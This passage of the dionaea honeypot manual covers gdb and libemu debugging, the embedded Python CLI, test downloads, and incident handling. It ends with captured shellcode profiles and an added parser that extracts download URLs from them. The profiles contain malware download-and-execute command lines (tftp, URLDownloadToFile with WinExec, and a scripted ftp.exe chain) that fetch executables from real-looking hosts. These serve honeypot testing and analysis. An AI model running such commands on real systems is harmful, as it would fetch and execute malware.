2576 --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2577
2578
2579 gdb
2580
2581
2582 logfile assisted
2583
For the above example, I was able to scrape the shellcode from the
logfile, and run it in libemu, without involving dionaea at all,
reducing the problem:
2587
2588 gdb /opt/dionaea/bin/sctest
2589 (gdb) run -S -s 10000000 -g < sc.bin
2590 Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2591
2592 Once it crashed, I retrieved a full backtrace:
2593
2594 Program received signal SIGSEGV, Segmentation fault.
2595 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2596 545 struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2597
2598 (gdb) bt full
2599 #0 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600 dll = 0x6366f0
2601 ehi = <value optimized out>
2602 hook = <value optimized out>
2603 c = 0x611180
2604 mem = <value optimized out>
2605 eip_save = <value optimized out>
2606 module = 2088763392
2607 p_procname = 4289925
2608 procname = <value optimized out>
2609 #1 0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2610 dll = <value optimized out>
2611 ehi = <value optimized out>
2612 hook = 0x64c5b0
2613 eip = <value optimized out>
2614 #2 0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2615 hook = 0xe2
2616 ev = 0x0
2617 iv = <value optimized out>
2618 cpu = 0x611180
2619 mem = <value optimized out>
2620 env = 0x629a30
2621 na = <value optimized out>
2622 j = 7169
2623 last_vertex = 0x0
2624 graph = 0x0
2625 eh = 0x0
2626 ehi = 0x0
2627 ret = <value optimized out>
2628 eipsave = 2088807840
2629 #3 0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2630 e = <value optimized out>
2631
In this case, the problem was a bug in libemu.

gdb dump memory
2634
2635 Once again, it broke, and we got a backtrace:
2636
2637 #0 0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2638 eqi = (struct emu_queue_item *) 0x0
2639 #1 0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2640 steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2641 current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2642 current_pos_ht = <value optimized out>
2643 current_pos_v = <value optimized out>
2644 current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2645 bfs_queue = (struct emu_queue *) 0xb3e17668
2646 ret = 4662443
2647 eipsave = <value optimized out>
2648 hook = <value optimized out>
2649 j = 4
2650 es = <value optimized out>
2651 eli = (struct emu_list_item *) 0xb3e17658
2652 cpu = (struct emu_cpu *) 0xb4109ab0
2653 mem = (struct emu_memory *) 0xb410c3a0
2654 eq = (struct emu_queue *) 0xb3da0918
2655 env = (struct emu_env *) 0xb3e10208
2656 eli = (struct emu_list_item *) 0x4724ab
2657 #2 0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2658 es = (struct emu_stats *) 0xb3d92b28
2659 new_results = (struct emu_list_root *) 0xb3da3bf0
2660 offset = <value optimized out>
2661 el = (struct emu_list_root *) 0xb4100510
2662 etas = (struct emu_track_and_source *) 0xb410cd60
2663 eh = (struct emu_hashtable *) 0xb3d7a810
2664 eli = (struct emu_list_item *) 0xb3d92b40
2665 results = (struct emu_list_root *) 0xb3d82850
2666 es = <value optimized out>
2667 __PRETTY_FUNCTION__ = "emu_shellcode_test"
2668 #3 0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2669 e = (struct emu *) 0xb4109cd0
2670 ctx = (struct emu_ctx *) 0x87a2400
2671 offset = 14356
2672 streamdata = (void *) 0xb411c698
2673 size = 8196
2674 ret = 0
2675 __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2676 #4 0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2677 No locals.
2678 #5 0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2679 con = (struct connection *) 0x8864b58
2680 pd = (struct processor_data *) 0x87dc388
2681 __PRETTY_FUNCTION__ = "processors_io_in_thread"
2682 #6 0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2683 t = (struct thread *) 0x87d7bd0
2684 timer = (GTimer *) 0xb4108540
2685 #7 0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2686 task = (gpointer) 0x87d7bd0
2687 pool = (GRealThreadPool *) 0x83db460
2688 #8 0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2689 __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2690 #9 0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2691 No symbol table info available.
2692 #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2693 No symbol table info available.
2694
Again, it was a bug in libemu, an unbreakable loop consuming all
memory. To reproduce it, we have to dump the tested buffer, therefore
we need the buffer’s address and size. Luckily the size is noted in
frame #2 as 8196, and the data address is a parameter which was not
optimized out in frame #2:
2700
2701 dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2702
2703 Afterwards, debugging libemu by feeding the data into sctest is easy.
2704
I’ve had fun with objgraph and gdb debugging reference count leaks in
python too; here <http://carnivore.it/2009/12/23/arcane_bugs> is the
writeup.
2708
2709 gdb python3 embedded
2710
2711 Sometimes, there is something wrong with the python scripts, but gdb
2712 does not provide any useful output:
2713
2714 bt full
2715 #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2716 stack_pointer = (PyObject **) 0x8259af0
2717 next_instr = (unsigned char *) 0x812fabf "m'"
2718 opcode = 100
2719 oparg = <value optimized out>
2720 why = 3071731824
2721 err = 1
2722 x = (PyObject *) 0xb7244aac
2723 v = <value optimized out>
2724 w = (PyObject *) 0xadb5e4dc
2725 u = (PyObject *) 0xb775ccb0
2726 freevars = (PyObject **) 0x8259af0
2727 retval = (PyObject *) 0x0
2728 tstate = (PyThreadState *) 0x809aab0
2729 co = (PyCodeObject *) 0xb717b800
2730 instr_ub = -1
2731 instr_lb = 0
2732 instr_prev = -1
2733 first_instr = (unsigned char *) 0x812f918 "t"
2734 names = (PyObject *) 0xb723f50c
2735 consts = (PyObject *) 0xb71c9f7c
2736 opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2737 0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2738 0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2739 0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2740 0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2741 0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2742 0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2743 0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2744 0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2745 0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2746 0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2747 #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2748 defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2749 f = (PyFrameObject *) 0x825998c
2750 retval = <value optimized out>
2751 freevars = (PyObject **) 0x8259af0
2752 tstate = (PyThreadState *) 0x809aab0
2753 x = <value optimized out>
2754 u = <value optimized out>
2755
Luckily python3 ships with some gdb macros, which assist in dealing
with this mess. You can grab them over here
<http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>,
and place them in ~/.gdbinit, where ~ is the home directory of the
user dionaea runs as. If you get /warning: not using untrusted file
“/home/user/.gdbinit”/, you are running gdb via sudo, and the file
/home/user/.gdbinit has to be owned by root. If you are running as
root, and you get /Program received signal SIGTTOU, Stopped (tty
output)./, run stty -tostop before running gdb, reattach the process
with fg, close gdb properly, and start over.
2766
Once you got the macros loaded properly at gdb startup, set a
breakpoint on PyEval_EvalFrameEx after dionaea loaded everything:
2769
2770 break PyEval_EvalFrameEx
2771
2772 Then we have some useful macros for gdb:
2773
2774 up
2775 pyframev
2776
2777 pyframev combines the output of pyframe and pylocals.
2778
Be aware that you can segfault dionaea from within gdb now: going up,
out of the python call stack, and calling some of the macros can and in
most cases will segfault dionaea, therefore use backtrace to make sure
you are still within valid frames. We can’t use pystack or pystackv as
they rely on Py_Main, which is an invalid assumption for embedded
python.
2785
dionaea embeds a python interpreter, and can therefore offer a python
cli too. The python cli is blocking: if you start entering a command,
the whole process will wait for you to finish it, and will not accept
any new connections. You can use the python cli to interact with
dionaea, which is very useful for development and debugging.
2792
2793 Configuration
2794 You can access the dionaea.conf via python (readonly):
2795
2796 from dionaea import g_dionaea
2797 g_dionaea.config()
2798
Completion and History on the CLI
If you use the cli often, you can make it behave like a real shell,
including history and completion:
2802
2803 import rlcompleter, readline
2804 readline.parse_and_bind('tab: complete')
2805
2806 Triggering Downloads
2807 Sometimes it helps to trigger a download, without waiting for an
2808 attack. Very useful if you want to verify permissions are correct when
2809 switching the user, or making sure a submission to a 3rd party works
2810 correctly. You can trigger downloads for all major protocols.
2811
2812 ftp
2813 from dionaea.ftp import ftp
2814 f = ftp()
2815 f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2816
2817 tftp
2818 from dionaea.tftp import TftpClient
2819 t = TftpClient()
2820 t.download(None, 'tftp.example.com', 69, 'filename')
2821
2822 http
As the http download is not done in python, we do not use the download
facility directly, but create an incident, which will trigger the
download:
2826
2827 from dionaea.core import incident
2828 i = incident("dionaea.download.offer")
2829 i.set("url", "http://www.honeynet.org")
2830 i.report()
2831
2832 incidents
Incidents are the IPC mechanism used within dionaea.
2834
2835 dumping
from dionaea.core import ihandler

class idumper(ihandler):
    """Dump every incident whose name matches pattern ('*' matches all)."""
    def __init__(self, pattern):
        ihandler.__init__(self, pattern)

    def handle(self, icd):
        icd.dump()

a = idumper('*')
2844
2845 emu profile
Small collection of various shellcode profiles gathered from dionaea.
2847
2848 CreateProcess Commands
2849 This profile will trigger a download via tftp.
2850
2851 p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2852 from dionaea.core import incident
2853 i = incident("dionaea.module.emu.profile")
2854 i.set("profile", str(p))
2855 i.report()
2856
2857 URLDownloadToFile
2858 This profile will trigger a download.
2859
2860 p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2861 from dionaea.core import incident
2862 i = incident("dionaea.module.emu.profile")
2863 i.set("profile", str(p))
2864 i.report()
2865
2866 WinExec Commands
This profile uses WinExec to create a command file for the windows ftp
client, downloads a file, and executes the file:
2869
2870 p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2871 from dionaea.core import incident
2872 i = incident("dionaea.module.emu.profile")
2873 i.set("profile", str(p))
2874 i.report()
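The three profiles above, together with the Payloads section earlier in this document, show the raw material dionaea reads an intention from. As an added example, not dionaea's own code, here is a Python function that takes a profile in this JSON format and lists the download locations the shellcode would fetch; its handling of tftp.exe and scripted ftp.exe command lines is a simplification of what dionaea's cmd.exe emulation does, and the three embedded profiles are constructed to mirror the ones above with example hosts.

```python
"""Extract download locations from a libemu shellcode profile.

Added example, not part of dionaea. The profile format is the one shown
above: a JSON list of {"call", "args", "return"} records, the text passed
to the "dionaea.module.emu.profile" incident. The command-line rules are a
simplification of what dionaea's cmd.exe emulation does with ftp/tftp.
"""
import json
import re

# "tftp.exe -i HOST get FILE", as in the CreateProcess profile above.
TFTP_RE = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<file>\S+)", re.I)
# Leading "cmd /c " or "cmd.exe /c " wrapper around the real command line.
CMD_PREFIX_RE = re.compile(r"^cmd(?:\.exe)?\s+/c\s+", re.I)


def ftp_script(cmdline):
    """Reassemble the ftp.exe script written with 'echo ... >> file' chains;
    returns the ftp commands in order, e.g. ['open host 21', 'user u p']."""
    cmds = []
    for part in cmdline.split("&"):
        part = CMD_PREFIX_RE.sub("", part.strip())
        if part.lower().startswith("echo "):
            # Drop the redirection target ('> i' or '>> i').
            cmds.append(re.split(r"\s*>{1,2}\s*", part[5:], maxsplit=1)[0].strip())
    return cmds


def offers_from_command(cmdline):
    """URLs one Windows command line would fetch (tftp and scripted ftp)."""
    offers = []
    m = TFTP_RE.search(cmdline)
    if m:
        offers.append("tftp://%s/%s" % (m.group("host"), m.group("file")))
    lowered = cmdline.lower()
    if "ftp" in lowered and "echo" in lowered:
        host, port, user, password = None, "21", "anonymous", "guest"
        for cmd in ftp_script(cmdline):
            words = cmd.split()
            verb = words[0].lower() if words else ""
            if verb == "open" and len(words) >= 2:
                host = words[1]
                port = words[2] if len(words) >= 3 else "21"
            elif verb == "user" and len(words) >= 2:
                user = words[1]
                password = words[2] if len(words) >= 3 else ""
            elif verb == "get" and len(words) >= 2 and host:
                offers.append("ftp://%s:%s@%s:%s/%s"
                              % (user, password, host, port, words[1]))
    return offers


def download_offers(profile_json):
    """Return the download URLs a profile implies, in call order."""
    offers = []
    for rec in json.loads(profile_json):
        call, args = rec.get("call"), rec.get("args", [])
        if call == "URLDownloadToFile" and len(args) >= 2:
            offers.append(args[1])                         # szURL
        elif call == "WinExec" and args:
            offers.extend(offers_from_command(args[0]))    # lpCmdLine
        elif call == "CreateProcess" and len(args) >= 2:
            # lpCommandLine, falling back to lpApplicationName
            offers.extend(offers_from_command(args[1] or args[0]))
    return offers


# Constructed profiles mirroring the three above, with example hosts and
# the STARTUPINFO/PROCESS_INFORMATION blocks shortened.
PROFILE_TFTP = json.dumps([
    {"call": "CreateProcess", "return": "-1",
     "args": ["", "tftp.exe -i 192.0.2.10 get ssms.exe", "", "", "1", "40",
              "", "", {"cb": "0"}, {"dwProcessId": "4712"}]},
    {"call": "CreateProcess", "return": "-1",
     "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"cb": "0"},
              {"dwProcessId": "4712"}]},
    {"call": "ExitThread", "args": ["0"], "return": "0"},
])
PROFILE_URL = json.dumps([
    {"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"},
    {"call": "URLDownloadToFile", "return": "0",
     "args": ["", "http://192.0.2.20/compiled.exe", "47.scr", "0", "0"]},
    {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"},
])
PROFILE_FTP = json.dumps([
    {"call": "WinExec", "return": "32",
     "args": ["cmd /c echo open ftp.example.net 21 > i&echo user wat l0l1 "
              ">> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i "
              "&SCUM.EXE\r\n", "0"]},
    {"call": "ExitThread", "args": ["0"], "return": "0"},
])
```

Calling download_offers(PROFILE_FTP) yields ['ftp://wat:l0l1@ftp.example.net:21/SCUM.EXE'], the same location dionaea's shell emulation would hand to its ftp downloader for that profile.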
2875
2881
2883 dionaea
2884
2886 2015, dionaea
2887
2888
2889
2890
28910.7.0 Jan 31, 2019 DIONAEA(1)